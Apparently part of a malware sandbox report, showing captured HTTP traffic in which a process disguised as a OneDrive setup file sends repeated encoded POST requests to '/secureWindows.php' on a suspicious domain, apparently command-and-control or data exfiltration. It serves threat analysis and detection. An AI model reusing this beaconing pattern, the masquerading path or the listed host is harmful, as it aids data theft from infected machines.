                                                        Server: cloudflare
                                                        CF-RAY: 8da8a155fd696b3b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1255&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1088721&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        95 | 192.168.2.4 | 50002 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:29.342559099 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        96 | 192.168.2.4 | 50003 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:29.425164938 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:29.777234077 CET | 1340 | OUT | Data Raw: 52 55 59 56 55 5a 56 55 58 57 50 59 55 5d 5b 5b 54 59 5c 5c 59 52 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RUYVUZVUXWPYU][[TY\\YRZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%-0X(8'[7.%#%=(_-)(]79<'*3_+C>0^&.* F$,Z*1
                                                        Oct 30, 2024 05:23:30.013386965 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:30.319641113 CET | 933 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dpGEh5BXW15zqnJso25AwgCPzlaAiEMZzvGzqbO%2F3VPnd3RIQ%2BV8Z0IRLlkCgNAca6paNSIHM4bKB3W2tC327qAcsNnr8hT16ChMQM14M0OCZHw9J7MCiimyotb1PklevCSVLL3tg6A%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a15c3e526c81-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1203657&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 56 28 16 30 51 25 1d 08 58 2b 2c 04 06 2a 2e 25 00 30 22 24 5d 24 3f 22 5f 2a 3b 3f 5f 29 24 28 10 28 1c 0a 1f 20 08 2f 06 2a 2b 2f 46 0c 10 24 02 30 0c 05 53 28 30 2d 59 3e 01 2f 1a 22 20 29 03 3d 07 30 0d 21 30 34 5f 27 57 25 0f 2d 3d 22 1e 2d 43 21 06 2e 20 2b 0f 3e 00 21 57 08 14 22 5d 25 3c 30 04 27 3e 24 1b 32 0b 25 03 34 01 09 5d 23 3b 0c 58 3f 2b 20 55 26 20 30 13 27 23 3f 56 26 5f 2f 07 3e 31 20 0d 26 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&V(0Q%X+,*.%0"$]$?"_*;?_)$(( /*+/F$0S(0-Y>/" )=0!04_'W%-="-C!. +>!W"]%<0'>$2%4]#;X?+ U& 0'#?V&_/>1 &"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        97 | 192.168.2.4 | 50005 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:29.542385101 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:29.886553049 CET | 1076 | OUT | Data Raw: 57 50 5c 52 55 5d 53 56 58 57 50 59 55 51 5b 5c 54 58 5c 58 59 54 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\RU]SVXWPYUQ[\TX\XYTZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,=(+"3#D9&(_&=Z/4\#''*(<&>$(Y/: F$,Z*
                                                        Oct 30, 2024 05:23:30.141432047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:30.357450962 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HJ4jwtO7qYW9EzW6adb6HchgCad4bYIhxVok3Mo2sOtJUZCt%2FnZUf81JP5O4G1sESu1YJAhP3geJgSlqFbrDugEayH5GvBh6gUSkYP%2BRcWy6IvSalEX1Z7f%2BmoJdF7xp6UmLLq%2FEpa8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a15d0ecc2fe8-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1409&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1124223&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        98 | 192.168.2.4 | 50011 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:30.484951019 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:30.839778900 CET | 1076 | OUT | Data Raw: 57 5f 59 57 55 59 53 51 58 57 50 59 55 5e 5b 5c 54 52 5c 5f 59 5d 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YWUYSQXWPYU^[\TR\_Y]Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_-0&\=()'[;A9?%#,\4\7*1:(+!&+5_9: F$,Z*=
                                                        Oct 30, 2024 05:23:31.089333057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:31.392759085 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neAlo8KYhfi9cHaY4gwYoK9jW89xv1wgAN4tqREfGEM35QbijWaGZmNnatWNdJB8327aj%2BxG9lBmhxqm0vJPpSBGQKklvMdO0mgn3yZg8T2ilfBsTifwMu8cg14IHhzly5yykk3Yb3M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a162fbaa6b71-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1005&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1483606&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        99 | 192.168.2.4 | 50017 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:31.532834053 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:31.886759043 CET | 1076 | OUT | Data Raw: 57 53 5c 56 55 59 56 54 58 57 50 59 55 5b 5b 59 54 5d 5c 5a 59 52 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VUYVTXWPYU[[YT]\ZYRZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^80<"'$96(_1-'/X7: %9?]?C5'X.* F$,Z*)
                                                        Oct 30, 2024 05:23:32.183770895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:32.356081009 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNx3c9E3KsALlLq71ZFSTLLuyJcVaGDgySjAplh8BgSOLjmHeI5OnphmF4oq73S3QPcf2zhhU9A%2BN2nLrAi15KsXF1rx6o1T97Ovr%2Bq7bMnnD65vJDTzAnrMTQiJDsj0HIhrHnrMzD8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a169ad31e85b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1403&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1092006&cwnd=94&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        100 | 192.168.2.4 | 50025 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:32.481703997 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:32.839766979 CET | 1076 | OUT | Data Raw: 52 53 5c 54 50 58 53 57 58 57 50 59 55 5e 5b 52 54 5b 5c 5a 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\TPXSWXWPYU^[RT[\ZY]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;3"Y<8*X%-/C-(2;/, 9#Z19+^(&:'+&. F$,Z*=
                                                        Oct 30, 2024 05:23:33.102971077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:33.274669886 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlGRWm7MzgLjZxBldLF88rs0Jm82QnmNmbFbYNshWfXUM3%2FqNSCPgtzQ3gsR9Y4%2BWWBjVXeusFGcbIrppwJCMztPL8hFBI%2FzMCykT0Jirha8DnVfDquflErCXv5%2FsXy1aK9hGOkRMUI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a16f5cde6b32-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1283687&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        101 | 192.168.2.4 | 50031 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:33.404351950 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:33.761533976 CET | 1076 | OUT | Data Raw: 57 54 59 56 50 5d 56 56 58 57 50 59 55 5d 5b 59 54 5e 5c 5b 59 56 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYVP]VVXWPYU][YT^\[YVZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\-09=;2]'=;C.C?%=;8\7*?2: )6&36- F$,Z*1
                                                        Oct 30, 2024 05:23:33.994044065 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:34.194804907 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6bMjrQHHsB3HlaqBt7boHlf%2BqI4rMBwzugsaiP8ZE5aclKHaIEbaG1FX%2BrWwb7Y4Ixi6Lz4pDYhB4db4tlCQdaFvyHYHETPWiDUBIQKqHmL5P2FOtqAcP%2B3%2Fu4qF%2FgknG3q8gC3WnI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1751ec20bd8-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1371&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1081404&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        102 | 192.168.2.4 | 50037 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:34.325889111 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:34.684597969 CET | 1076 | OUT | Data Raw: 57 52 5c 5c 55 5c 56 50 58 57 50 59 55 51 5b 5e 54 5c 5c 59 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\\U\VPXWPYUQ[^T\\YYPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/3"]<>X0B:$Z%[0,*(Y4\?&,(!]'^5[:: F$,Z*
                                                        Oct 30, 2024 05:23:34.957293034 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:35.275758028 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBtCn0vKTTfdRTmiugAJMThytuDVlc1tCb%2FSdIHInLiSepWVkQq2I0FkOT92vDitynKLElQ6MkOMkxpUJffMRvtJh0tcVylxcF%2BtLRI04R3qp2WMJc9wLW5CYRugSm8thE%2BdQCQBVLc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a17b2db4e96a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2053&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=703937&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        103 | 192.168.2.4 | 50044 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:35.333918095 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        104 | 192.168.2.4 | 50045 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:35.410902977 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:35.763493061 CET | 1076 | OUT | Data Raw: 57 53 5c 52 55 54 56 55 58 57 50 59 55 59 5b 5a 54 59 5c 5d 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\RUTVUXWPYUY[ZTY\]YQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;_?(>]3+-,&-;# )'1()&(&/: F$,Z*!
                                                        Oct 30, 2024 05:23:36.005520105 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:36.320442915 CET | 784 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEFQHMUv%2Fy9zZOTDSGl7oZo3Gc7gupyRbcUjeLVGM6WkHsdQF4RPDyiJKcr2EFIhQmg%2BEJPWpLO3Nmt1zawzjwaGVcoxyipU37E8oAEyowLkr3VP6R5mI2HkC2f3nyR8usNnw83hUQM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a181ae35e542-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1189811&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        105  192.168.2.4  50051  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:23:36.457453966 CET  286  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:36.809007883 CET  1076  OUT  Data Raw: 57 54 59 52 55 54 56 53 58 57 50 59 55 51 5b 59 54 53 5c 5d 59 53 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYRUTVSXWPYUQ[YTS\]YSZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,0"X=+.\$-B,%02 ;' )+&: +3(- F$,Z*
                                                        Oct 30, 2024 05:23:37.048707962 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:37.361608982 CET  787  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
